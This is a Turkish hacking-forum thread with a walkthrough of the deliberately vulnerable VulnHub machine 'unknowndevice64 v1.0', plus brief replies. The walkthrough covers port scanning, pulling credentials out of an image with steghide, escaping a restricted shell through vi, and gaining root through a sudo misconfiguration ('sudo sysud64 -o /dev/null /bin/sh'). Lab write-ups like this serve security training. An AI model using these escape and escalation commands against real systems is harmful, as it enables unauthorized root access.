THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly

Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
17-01-2020 23:19
#1
unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly
unknowndevice64 v1.0: VulnHub


Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "unknowndevice64 v2.0: VulnHub Zafiyetli Makine Çözümü" konusunu anlatacağım.





unknowndevice64-v1.0







İsim: unknowndevice64 v1.0: VulnHub

Çıkış Tarihi: 9 Mar 2019

Zorluk: Başlangıç

Dosya Boyutu: 282-mb/280-mb

Açıklama: "Root Erişimini Almak"

Hedef: flag.txt

Seri: unkowndevice64








unknowndevice64 v1.0 Zafiyetli Makine Çözümü



Öncelikle zafiyetli makinemizin ip adresini öğrenebilmek için terminale netdiscover yazıyoruz.






Ardından nmap ile tarama yapıyoruz ve sonucunda iki adet "1337 ve 31337" portlarının açık olduğunu görüyoruz.


Kod:
nmap -A 192.168.204.129






Ardından "31337" portu üzerinden anasayfamıza bir göz atıyoruz.






Ardından anasayfamızda "h1dd3n" kelimemizin gizlendiğini görüyoruz. Ardından sayfamızın kaynak kodlarına göz atıyoruz.







Ardından kaynak kodlarında bulduğumuz "key_is_h1dd3n.jpg" dosyasını tarayıcımızda açıyoruz.

Daha sonrasında bilgisayarımıza bu resim dosyasını kaydediyoruz.






Ardından dosyayı kaydettiğimiz konuma geçiyoruz ve ve aşağıdaki kodu terminalimize yazıyoruz.

Kod:
steghide extract -sf key_is_h1dd3n.jpg






Ardından karşımıza bir metin dosyası çıkıyor. Aşağıdaki kod ile dosyayı okuyoruz ve çıkan metini dönüştürücüye atıyoruz.

Kod:
cat h1dd3n.txt






Ardından kullanıcı adımız ve şifremiz karşımıza çıkıyor.

Kod:
Username: ud64
Password: 1M!#64@ud





Ardından makinemize 1337 portu ile giriş yapıyoruz ve aşağıdaki komutları yazıyoruz.

Kod:
ssh ud64@192.168.204.129 -p 1337






Daha sonrasında sırasıyla "id, ls, echo $SHELL, echo $PATH, export SHELL=/bin/bash:$SHEL, export PATH=/usr/bin:$PATH" yazıyoruz.

Kod:
id






Kod:
ls


Kod:
echo $SHELL





Kod:
echo $PATH


Kod:
export SHELL=/bin/bash:$SHEL





Kod:
export PATH=/usr/bin:$PATH






Ardından terminale "vi" yazıyoruz.

Kod:
vi







Ardından gelen sayfada gerekli kısıma giriş yapmak için aşağıdaki kodu giriyoruz.

Kod:
:!/bin/bash






Ardından gerekli komutları yazıyoruz ve "su" izni olmadan giriş yapabileceğimizi öğreniyoruz.

Kod:
export PATH=/usr/bin:$PATH


Kod:
export SHELL=/bin/bash:$SHELL
sudo -l






Ardından sudo ile aşağıdaki kodu çalıştırıyoruz.

Kod:
sudo sysud64 -h | less






Ardından "sh" içerisinden çalıştırmamız gereken satırlar olduğundan dolayı aşağıdaki komutu yazıyoruz.

Kod:
sudo sysud64 -o /dev/null /bin/sh






Ardından sırasıyla "id, ls, cd /root, ls" yazıyoruz. Ardından flag dosyamız karşımıza çıkıyor. Dosyamızı aşağıdaki komutla okuyoruz.

Kod:
cat flag.txt







Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler.



Konu Xowly tarafından (19-01-2020 18:35 Saat 18:35 ) değiştirilmiştir.
PourLa, "P4RS, By Ghost, rewecetr Teşekkür etti.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
19-01-2020 19:07
#2
Cevap: unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly
Ellerine sağlık
Xowly Teşekkür etti.
Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
19-01-2020 20:46
#3
Cevap: unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık
Teşekkür ederim hocam
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
23
Mesajlar:
939
Konular:
143
Teşekkür (Etti):
396
Teşekkür (Aldı):
405
Ticaret:
(0) %
20-01-2020 12:41
#4
Cevap: unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly
Eline sağlık detaylı ve güzel anlatım olmuş
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Uchiha-Sasuke - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.344
Konular:
74
Teşekkür (Etti):
30
Teşekkür (Aldı):
371
Ticaret:
(0) %
20-01-2020 12:44
#5
Cevap: unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly
Ellerine Sağlık Dostum
---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".


Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
20-01-2020 16:40
#6
Cevap: unknowndevice64 v1.0 VulnHub Zafiyetli Makine Çözümü // Xowly
Alıntı:
Uchiha-Sasuke´isimli üyeden Alıntı Mesajı göster
Ellerine Sağlık Dostum
Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Eline sağlık detaylı ve güzel anlatım olmuş
Teşekkürler Arkadaşlar

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler